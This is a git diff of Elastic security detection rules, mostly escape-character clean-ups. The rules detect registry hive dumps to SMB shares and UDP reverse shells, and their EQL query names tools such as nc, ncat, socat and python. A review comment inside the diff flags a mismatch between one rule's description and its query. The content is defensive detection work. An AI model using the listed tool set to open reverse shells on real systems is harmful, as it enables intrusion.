 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json
index b8caa522f01..207a71c6645 100644
--- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_103.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json
index e43b4d9afe5..fd76e67405c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json
index a78185e581a..36ee1213939 100644
--- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json
index c13c7219bb5..3f999ce0558 100644
--- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json
index 13d3b3acd2b..e9e46820d35 100644
--- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Windows Registry File Creation in SMB Share",
 "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. 
Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
 "references": [
 "https://www.elastic.co/security-labs/detect-credential-access"
 ],
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
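Review bot: The `note` on the new side says the rule "identifies the creation or modification of a medium-size registry hive file on an SMB share", but the `query` on the same hunk matches only `event.type == "creation"`, so a write to an already-present hive file on the share would not alert. Either the description should say creation only, or the query should also cover a modification event type; which one is intended is not visible from this hunk. The same wording/query mismatch is in the `_105`, `_106` and `_107` sections that follow. The `\u003e=` to `>=` change itself is serialization only and does not alter the EQL.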
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json
index 3ef78157c21..002d8dd9264 100644
--- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Windows Registry File Creation in SMB Share",
 "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. 
Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
 "references": [
 "https://www.elastic.co/security-labs/detect-credential-access"
 ],
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json
index ea68cc2ae50..d8c771bad90 100644
--- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Windows Registry File Creation in SMB Share",
 "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. 
Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n",
 "references": [
 "https://www.elastic.co/security-labs/detect-credential-access"
 ],
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json
index c3892ca8016..5a617695f9f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json
@@ -12,7 +12,7 @@
 "license": "Elastic License v2",
 "name": "Windows Registry File Creation in SMB Share",
 "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. 
Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n 
\"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n",
 "references": [
 "https://www.elastic.co/security-labs/detect-credential-access"
 ],
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json
index bfe75a90d20..a067057a161 100644
--- a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json
index a2f64e7b964..bfca23f4ae2 100644
--- a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json
index 1ecc06d2fb4..e74743356c7 100644
--- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via UDP", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sample by host.id, process.pid, process.parent.pid\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"execve\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\",\n \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\",\n \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\")]\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"socket\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"connect\" and 
process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and network.direction == \"egress\" and destination.ip != null and \n destination.ip != \"127.0.0.1\" and destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" 
@@ -83,7 +83,7 @@ ], "risk_score": 47, "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. 
The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "OS: Linux", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json index 3834485276b..2b3a1b06f6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json
index 9e575989545..eb8b03a9427 100644
--- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json
@@ -92,7 +92,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -114,7 +114,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json
new file mode 100644
index 00000000000..29006eb1d7a
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json
